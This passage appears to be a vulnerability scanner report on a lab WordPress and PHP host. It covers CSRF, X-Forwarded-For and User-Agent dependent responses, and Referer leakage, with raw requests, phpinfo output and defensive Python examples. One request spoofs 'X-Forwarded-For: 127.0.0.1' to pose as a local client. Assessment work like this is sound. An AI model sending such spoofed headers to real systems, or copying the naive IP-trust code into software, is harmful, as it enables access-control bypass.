Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

user_login=555-555-0199@example.com&wp-submit=Get+New+Password&redirect_to=

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:24 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2684
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...

Request 2

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://HSrfGgeH.com/wp-login.php?action=lostpassword
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

user_login=555-555-0199@example.com&wp-submit=Get+New+Password&redirect_to=

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:57 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2684
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
3.2.2. http://10.250.200.5:81/login

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://10.250.200.5:81
Path:   /login

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

password=&username=

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:05 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 914
Connection: close
Content-Type: text/html; charset=UTF-8

ERROR username or password blank<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<li
...[SNIP]...

Request 2

POST /login HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://aGwlKHW.5:81:81/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+; access_level=0

password=&username=

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:18 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 914
Connection: close
Content-Type: text/html; charset=UTF-8

ERROR username or password blank<!DOCTYPE html>
<html lang="en">

<head>
<title></title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<li
...[SNIP]...
3.2.3. http://10.250.200.5:81/search

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://10.250.200.5:81
Path:   /search

Issue detail

The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against unauthenticated functionality. This is unlikely to constitute a security vulnerability in its own right, however it may facilitate exploitation of other vulnerabilities affecting application users.

Request 1

POST /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

query=555-555-0199@example.com

Response 1

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:48:40 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2254
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font
...[SNIP]...

Request 2

POST /search HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://ELmMbZz.5:81:81/
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_baf0a32bf708ebfb24022d9545b279af=+; wordpressuser_baf0a32bf708ebfb24022d9545b279af=+; wordpresspass_baf0a32bf708ebfb24022d9545b279af=+

query=555-555-0199@example.com

Response 2

HTTP/1.1 200 Ok
Date: Wed, 08 Nov 2017 11:53:21 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Content-Length: 2254
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>

<head>
       <title>555-555-0199@example.com - Kafeh khar-feim</title>
   </head>

<body>
   <form action="search" method="GET">
       <h1 style="text-align: center;">
           <span style="font
...[SNIP]...
3.3. X-Forwarded-For dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5:81
Path:   /phpinfo.php/

Issue description

Application responses may depend systematically on the presence or absence of an X-Forwarded-For header in requests. This behavior does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Some applications enforce access controls based on the remote IP address of the connecting client. For example, an application might expose administrative functionality only to clients connecting from the local IP address of the server. In some configurations, the presence of an X-Forwarded-For header misleads the application about the client's IP address, allowing an attacker to masquerade as a trusted user. You should review the purpose of the relevant functionality to determine whether this might be the case.

Issue remediation

The X-Forwarded-For header is not a robust foundation on which to build any security measures, such as access controls. Any such measures should be replaced with more secure alternatives that are not vulnerable to spoofing.

If the platform application server returns incorrect information about the client's IP address due to the presence of an X-Forwarded-For header, then the server may need to be reconfigured, or an alternative method of identifying clients should be used.
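The following is an added example, not code from the Burp report or from the scanned application. It shows the client-address logic the finding warns about, trusting X-Forwarded-For outright, beside a version that honours the header only when the TCP peer is a configured reverse proxy and then takes the address that proxy appended. The environment values are constructed from the phpinfo output below (REMOTE_ADDR 10.250.100.116, the injected X-Forwarded-For: 127.0.0.1); the trusted proxy address 172.18.0.1 and the loopback-only admin rule are assumptions.

```python
"""Added example (not from the Burp report): client IP derivation that trusts
X-Forwarded-For blindly, beside a hardened version. Sample values are taken
from the phpinfo output in this finding; the proxy address is an assumption."""
import ipaddress
from typing import Callable, Dict, Set

# Assumption: the only reverse proxy allowed to set X-Forwarded-For.
TRUSTED_PROXIES: Set[str] = {"172.18.0.1"}

# Constructed from Request 2 / Response 2 of this finding.
SPOOFED_ENV = {"REMOTE_ADDR": "10.250.100.116", "HTTP_X_FORWARDED_FOR": "127.0.0.1"}
# Constructed: the same client, genuinely behind the trusted proxy, still
# sending its own forged 127.0.0.1 entry, which the proxy appends the real peer to.
VIA_PROXY_ENV = {"REMOTE_ADDR": "172.18.0.1",
                 "HTTP_X_FORWARDED_FOR": "127.0.0.1, 10.250.100.116"}


def client_ip_naive(env: Dict[str, str]) -> str:
    """The pattern the finding warns about: any client can set the header,
    and taking the left-most entry takes the one the client wrote."""
    xff = env.get("HTTP_X_FORWARDED_FOR")
    if xff:
        return xff.split(",")[0].strip()
    return env["REMOTE_ADDR"]


def client_ip_hardened(env: Dict[str, str], trusted: Set[str] = TRUSTED_PROXIES) -> str:
    """Use X-Forwarded-For only if REMOTE_ADDR is a trusted proxy, and then walk
    the list from the right, past any further trusted proxies, to the first
    address a trusted hop appended. Everything left of it is client-supplied."""
    peer = env["REMOTE_ADDR"]
    if peer not in trusted:
        return peer
    hops = [h.strip() for h in env.get("HTTP_X_FORWARDED_FOR", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop in trusted:
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break          # malformed entry: do not trust the chain at all
        return hop
    return peer


def is_local_admin(ip: str) -> bool:
    """Access rule of the kind the finding describes: admin only from the host itself."""
    return ipaddress.ip_address(ip).is_loopback


def admin_allowed(env: Dict[str, str],
                  resolver: Callable[[Dict[str, str]], str] = client_ip_naive) -> bool:
    """Whether the request would reach admin functionality under the given resolver."""
    return is_local_admin(resolver(env))


if __name__ == "__main__":
    print("naive    :", client_ip_naive(SPOOFED_ENV), admin_allowed(SPOOFED_ENV, client_ip_naive))
    print("hardened :", client_ip_hardened(SPOOFED_ENV), admin_allowed(SPOOFED_ENV, client_ip_hardened))
    print("via proxy:", client_ip_hardened(VIA_PROXY_ENV))
```

With the naive resolver the spoofed request is treated as coming from 127.0.0.1 and the loopback-only rule admits it; the hardened resolver ignores the header because the peer is not a trusted proxy, and when the request really does arrive through the proxy it picks the address the proxy appended rather than the forged entry in front of it.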

Request 1

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:15 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
<tr><td class="e">SERVER_SIGNATURE </td><td class="v">&lt;address&gt;Apache/2.4.10 (Debian) Server at 10.250.200.5 Port 81&lt;/address&gt;
</td></tr>
<tr><td class="e">SERVER_SOFTWARE </td><td class="v">Apache/2.4.10 (Debian) </td></tr>
<tr><td class="e">SERVER_NAME </td><td class="v">10.250.200.5 </td></tr>
<tr><td class="e">SERVER_ADDR </td><td class="v">172.18.0.6 </td></tr>
<tr><td class="e">SERVER_PORT </td><td class="v">81 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">10.250.100.116 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v"><i>no value</i> </td></tr>
<tr><td class="e">CONTEXT_DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">SERVER_ADMIN </td><td class="v">webmaster@localhost </td></tr>
<tr><td class="e">SCRIPT_FILENAME </td><td class="v">/var/www/html/redirect.php </td></tr>
<tr><td class="e">REMOTE_PORT </td><td class="v">53679 </td></tr>
<tr><td class="e">GATEWAY_INTERFACE </td><td class="v">CGI/1.1 </td></tr>
<tr><td class="e">SERVER_PROTOCOL </td><td class="v">HTTP/1.1 </td></tr>
<tr><td class="e">REQUEST_METHOD </td><td class="v">GET </td></tr>
<tr><td class="e">QUERY_STRING </td><td class="v">orig=/phpinfo.php/ </td></tr>
<tr><td class="e">REQUEST_URI </td><td class="v">/phpinfo.php/ </td></tr>
<tr><td class="e">SCRIPT_NAME </td><td class="v">/phpinfo.php/ </td></tr>
</table>
<h2>HTTP Headers Information</h2>
<table>
<tr class="h"><th colspan="2">HTTP Request Headers</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /phpinfo.php/ HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">10.250.200.5:81 </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* </td></tr>
<tr><td class="e">Accept-Language </td><td class="v">en </td></tr>
<t
...[SNIP]...

Request 2

GET /phpinfo.php/ HTTP/1.1
Host: 10.250.200.5:81
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5:81/robots.txt
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0; wordpress_test_cookie=WP+Cookie+check
X-Forwarded-For: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:53:00 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.31
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
x-xss-protection: 0
Content-Security-Policy-Report-Only: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' 'unsafe-inline';report-uri /csp_tattletale.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<style type="text/css">
body {background-color: #fff; co
...[SNIP]...
<td class="e">HTTP_X_FORWARDED_FOR </td><td class="v">127.0.0.1 </td></tr>
<tr><td class="e">PATH </td><td class="v">/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin </td></tr>
<tr><td class="e">SERVER_SIGNATURE </td><td class="v">&lt;address&gt;Apache/2.4.10 (Debian) Server at 10.250.200.5 Port 81&lt;/address&gt;
</td></tr>
<tr><td class="e">SERVER_SOFTWARE </td><td class="v">Apache/2.4.10 (Debian) </td></tr>
<tr><td class="e">SERVER_NAME </td><td class="v">10.250.200.5 </td></tr>
<tr><td class="e">SERVER_ADDR </td><td class="v">172.18.0.6 </td></tr>
<tr><td class="e">SERVER_PORT </td><td class="v">81 </td></tr>
<tr><td class="e">REMOTE_ADDR </td><td class="v">10.250.100.116 </td></tr>
<tr><td class="e">DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">REQUEST_SCHEME </td><td class="v">http </td></tr>
<tr><td class="e">CONTEXT_PREFIX </td><td class="v"><i>no value</i> </td></tr>
<tr><td class="e">CONTEXT_DOCUMENT_ROOT </td><td class="v">/var/www/html </td></tr>
<tr><td class="e">SERVER_ADMIN </td><td class="v">webmaster@localhost </td></tr>
<tr><td class="e">SCRIPT_FILENAME </td><td class="v">/var/www/html/redirect.php </td></tr>
<tr><td class="e">REMOTE_PORT </td><td class="v">59370 </td></tr>
<tr><td class="e">GATEWAY_INTERFACE </td><td class="v">CGI/1.1 </td></tr>
<tr><td class="e">SERVER_PROTOCOL </td><td class="v">HTTP/1.1 </td></tr>
<tr><td class="e">REQUEST_METHOD </td><td class="v">GET </td></tr>
<tr><td class="e">QUERY_STRING </td><td class="v">orig=/phpinfo.php/ </td></tr>
<tr><td class="e">REQUEST_URI </td><td class="v">/phpinfo.php/ </td></tr>
<tr><td class="e">SCRIPT_NAME </td><td class="v">/phpinfo.php/ </td></tr>
</table>
<h2>HTTP Headers Information</h2>
<table>
<tr class="h"><th colspan="2">HTTP Request Headers</th></tr>
<tr><td class="e">HTTP Request </td><td class="v">GET /phpinfo.php/ HTTP/1.1 </td></tr>
<tr><td class="e">Host </td><td class="v">10.250.200.5:81 </td></tr>
<tr><td class="e">Accept </td><td class="v">*/* <
...[SNIP]...
3.4. User agent-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://10.250.200.5
Path:   /wp-login.php

Issue description

Application responses may depend systematically on the value of the User-Agent header in requests. This behavior does not itself constitute a security vulnerability, but may point towards additional attack surface within the application, which may contain vulnerabilities.

This behavior often arises because applications provide different user interfaces for desktop and mobile users. Mobile interfaces have often been less thoroughly tested for vulnerabilities such as cross-site scripting, and often have simpler authentication and session handling mechanisms that may contain problems that are not present in the full interface.

To review the interface provided by the alternate User-Agent header, you can configure a match/replace rule in Burp Proxy to modify the User-Agent header in all requests, and then browse the application in the normal way using your normal browser.

Request 1

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:47:08 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2193
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
<meta name='robots' content='noindex,follow' />
   </head>
   <body class="login login-action-login wp-core-ui locale-en-us">
       <div id="login">
       <h1><a href="https://wordpress.org/" title="Powered by WordPress" tabindex="-1">Fairweather &#038; sons</a></h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
       <label for="user_login">Username or Email<br />
       <input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
   </p>
   <p>
       <label for="user_pass">Password<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
   </p>
       <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> Remember Me</label></p>
   <p class="submit">
       <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
       <input type="hidden" name="redirect_to" value="http://10.250.200.5/wp-admin/" />
       <input type="hidden" name="testcookie" value="1" />
   </p>
</form>

<p id="nav">
   <a href="http://10.250.200.5/wp-login.php?action=lostpassword">Lost your password?</a>
</p>

<script type="text/javascript">
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}

wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
</script>

   <p id="backtoblog"><a href="http://10.250.200.5/">&larr; Back to Fairweather &#038; sons</a></p>
   
   </div>

   
       <div class="clear"></div>
   </body>
   </html>
   

Request 2

GET /wp-login.php HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:48:01 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 2256
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
   <!--[if IE 8]>
       <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
   <![endif]-->
   <!--[if !(IE 8) ]><!-->
       <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
...[SNIP]...
<meta name='robots' content='noindex,follow' />
   <meta name="viewport" content="width=device-width" />
       </head>
   <body class="login login-action-login wp-core-ui mobile locale-en-us">
       <div id="login">
       <h1><a href="https://wordpress.org/" title="Powered by WordPress" tabindex="-1">Fairweather &#038; sons</a></h1>
   
<form name="loginform" id="loginform" action="http://10.250.200.5/wp-login.php" method="post">
   <p>
       <label for="user_login">Username or Email<br />
       <input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
   </p>
   <p>
       <label for="user_pass">Password<br />
       <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
   </p>
       <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> Remember Me</label></p>
   <p class="submit">
       <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
       <input type="hidden" name="redirect_to" value="http://10.250.200.5/wp-admin/" />
       <input type="hidden" name="testcookie" value="1" />
   </p>
</form>

<p id="nav">
   <a href="http://10.250.200.5/wp-login.php?action=lostpassword">Lost your password?</a>
</p>

<script type="text/javascript">
function wp_attempt_focus(){
setTimeout( function(){ try{
d = document.getElementById('user_login');
d.focus();
d.select();
} catch(e){}
}, 200);
}

wp_attempt_focus();
if(typeof wpOnload=='function')wpOnload();
</script>

   <p id="backtoblog"><a href="http://10.250.200.5/">&larr; Back to Fairweather &#038; sons</a></p>
   
   </div>

   
       <div class="clear"></div>
   </body>
   </html>
   
3.5. Cross-domain Referer leakage

There are 5 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behavior should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

Applications should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
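The following is an added example, not the scanner's own code. It implements the test behind the five instances below (a query string in the page URL together with references to other hosts, which will receive that URL in Referer) over a constructed abridgement of the markup in Response 1 of 3.5.1, and adds a triage step the scanner leaves to the reviewer: flagging query parameters whose names suggest a secret. The list of sensitive-looking parameter names is an assumption.

```python
"""Added example (not the scanner's code): the Referer-leak condition, query
string plus cross-domain references, over a constructed sample, with a triage
of sensitive-looking query parameter names (the name list is an assumption)."""
from html.parser import HTMLParser
from typing import Dict, List, Set
from urllib.parse import parse_qs, urlsplit

URL_ATTRS = {"href", "src", "action"}   # attributes the browser fetches or follows
SENSITIVE_PARAMS = {"token", "session", "sessionid", "sid", "password", "key", "auth"}

# Constructed from the markup shown in 3.5.1 (abridged, same hosts).
SAMPLE_HTML = """<html><head>
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel='dns-prefetch' href='//fonts.googleapis.com'>
<link rel='dns-prefetch' href='//s.w.org'>
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Merriweather'>
<link rel='stylesheet' href='http://10.250.200.5/wp-content/themes/twentysixteen/genericons/genericons.css?ver=3.4.1'>
</head><body>
<a href="https://wordpress.org/">Proudly powered by WordPress</a>
<a href="/feed/">Feed</a>
</body></html>"""


class LinkCollector(HTMLParser):
    """Collects every URL-bearing attribute value in the document."""

    def __init__(self) -> None:
        super().__init__()
        self.urls: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        for name, value in attrs:
            if name in URL_ATTRS and value:
                self.urls.append(value)


def external_hosts(page_url: str, html: str) -> Set[str]:
    """Hosts other than the page's own that the page references. Scheme-relative
    URLs (//host/path) count, since the browser resolves them to a real host;
    path-only URLs stay on the same host and are ignored."""
    own = (urlsplit(page_url).hostname or "").lower()
    collector = LinkCollector()
    collector.feed(html)
    hosts: Set[str] = set()
    for url in collector.urls:
        host = urlsplit(url).hostname
        if host and host.lower() != own:
            hosts.add(host.lower())
    return hosts


def referer_leak(page_url: str, html: str) -> Dict[str, object]:
    """Scanner condition: a query string present and at least one other host
    referenced, so the full page URL goes out in Referer to that host. Also
    lists the query parameters whose names look sensitive, for triage."""
    query = urlsplit(page_url).query
    params = parse_qs(query, keep_blank_values=True)
    hosts = external_hosts(page_url, html)
    return {
        "query_string": query,
        "external_hosts": sorted(hosts),
        "sensitive_params": sorted(p for p in params if p.lower() in SENSITIVE_PARAMS),
        "leaks": bool(query) and bool(hosts),
    }


if __name__ == "__main__":
    print(referer_leak("http://10.250.200.5/?s=555-555-0199@example.com", SAMPLE_HTML))
    print(referer_leak("http://10.250.200.5/reset?token=abc123", SAMPLE_HTML))
```

For the 3.5.1 request the condition holds but the only parameter is the search term s, which is the kind of result the background text asks you to weigh against how far the receiving domains are trusted; a URL such as the second one, with a token in the query string, is the case the remediation is about.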



3.5.1. http://10.250.200.5/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://10.250.200.5
Path:   /

Issue detail

The page was loaded from a URL containing a query string (/?s=555-555-0199@example.com). The response contains links to the following other domains: gmpg.org, fonts.googleapis.com, s.w.org and wordpress.org.

Request 1

GET /?s=555-555-0199@example.com HTTP/1.1
Host: 10.250.200.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://10.250.200.5/
Cookie: PHPSESSID=3eca0ba18410f4712b54df4ef1328e48; access_level=0

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Nov 2017 11:45:32 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/5.6.25
Link: <http://10.250.200.5/wp-json/>; rel="https://api.w.org/"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9850

<!DOCTYPE html>
